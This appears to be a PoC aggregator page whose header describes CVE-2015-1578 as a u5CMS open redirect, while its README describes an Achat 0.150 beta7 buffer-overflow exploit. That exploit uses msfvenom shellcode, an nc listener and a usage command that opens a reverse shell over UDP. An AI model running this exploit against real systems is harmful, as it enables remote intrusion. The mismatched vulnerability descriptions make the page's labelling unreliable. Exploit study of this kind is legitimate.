POC详情: f984ce37ebb0495774657864de606e311344148a

来源
关联漏洞
标题: u5CMS 开放重定向漏洞 (CVE-2015-1578)
描述:u5CMS是一套基于PHP、MySQL和Apache的且用于中型网站、会议、审核流程、PayPal支付和在线调查的内容管理系统(CMS)。该系统支持所见即所得编辑器、创建调查表单和数据存储等。 u5CMS 3.9.4之前版本中存在开放重定向漏洞。远程攻击者可借助u5admin/pidvesa.php脚本的pidvesa cookie或u5admin/meta2.php脚本的‘uri’参数利用该漏洞将用户重定向到任意Web网站,实施钓鱼攻击。
描述
This is a proof-of-concept exploit for CVE-2015-1578, a buffer overflow vulnerability in Achat 0.150 beta7 on Windows. Exploitation leads to remote code execution via a crafted UDP packet.
介绍
# CVE-2015-1578-PoC

## Overview

This is a proof-of-concept exploit for **CVE-2015-1578**, a buffer overflow vulnerability in **Achat 0.150 beta7** on Windows. Exploitation leads to remote code execution via a crafted UDP packet.

## Purpose

This PoC is intended to serve as a clean, minimal, and well-structured example of exploit development. It demonstrates:

- Dynamic shellcode generation via `msfvenom`
- Argument-based targeting and configuration
- Integrated listener setup
- Simple payload delivery over UDP

## Video Tutorial

[![Video Tutorial](https://img.youtube.com/vi/92V7QXwGbxE/maxresdefault.jpg)](https://youtu.be/92V7QXwGbxE)

## Dependencies

- Python 3
- `msfvenom` (part of the Metasploit Framework)
- `rlwrap` (for enhanced Netcat usability)

## Features

- Dynamically creates the Unicode-encoded payload using `msfvenom`
- Automatically starts a listener using `rlwrap nc`
- Accepts clean command-line arguments
- Fails gracefully if optional payload modules are missing

## Arguments

`-i <target_ip>` Target IP address (required)
`-l, --lhost <listener_ip>` Local host IP for reverse shell (required)
`-p, --lport <port>` Local port for reverse shell (required)
`--rport <port>` Remote UDP port on target (default: 9256)

## Usage Example

```
python3 chatter.py -i 10.10.10.74 -l 10.10.16.7 -p 9393
```

This will:
- Generate the payload with the provided LHOST and LPORT
- Launch a listener in a background thread
- Send the exploit payload over UDP to the target
文件快照

[4.0K] /data/pocs/f984ce37ebb0495774657864de606e311344148a ├── [3.9K] chatter.py ├── [3.8K] kallisti.py └── [1.5K] README.md 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。